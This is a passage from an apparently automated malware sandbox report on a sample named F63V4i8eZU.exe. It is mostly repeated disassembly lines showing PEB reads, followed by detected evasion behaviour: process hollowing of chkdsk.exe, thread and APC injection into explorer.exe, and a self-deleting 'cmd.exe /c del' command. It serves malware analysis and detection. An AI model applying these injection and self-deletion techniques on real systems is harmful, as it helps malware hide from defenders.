      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054A3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05513D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05487D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05538D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0552E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0546AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054EA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05518DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 31_2_054935A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055305AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055305AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055214FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05478794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05498E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054936CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054776E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054916E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054F41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05480050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05480050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05522073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05534015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05534015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054658EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\chkdsk.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: E30000
Source: C:\Users\user\Desktop\F63V4i8eZU.exe | Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: explorer.exe, 0000001D.00000000.454581966.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
